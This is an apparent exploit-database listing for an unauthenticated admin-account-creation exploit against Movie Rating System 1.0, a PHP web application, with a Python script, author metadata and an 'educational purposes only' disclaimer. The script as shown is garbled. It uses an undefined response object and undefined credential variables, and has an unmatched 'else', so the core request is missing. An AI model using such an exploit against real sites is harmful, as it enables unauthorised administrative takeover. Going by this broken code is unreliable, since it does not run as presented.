Movie rating system 1.0 broken access control (admin account creation) (unauthenticated) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2022-01-05 |
Type : webapps |
Platform : php
This exploit / vulnerability Movie rating system 1.0 broken access control (admin account creation) (unauthenticated) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Windows
import requests
import json
url = input('Url:')
if not url.startswith('http://') and not url.startswith('https://'):
url = "http://" + url
if not url.endswith('/'):
url = url + "/"
data = json.loads(resp.text)
status = data["status"]
if status == "success":
print("Login Successfully\nUsername:"+ Username+"\nPassword:"+Password)
else:
print("Exploited but not loginned")
else:
print("Not injectable")
Movie rating system 1.0 broken access control (admin account creation) (unauthenticated)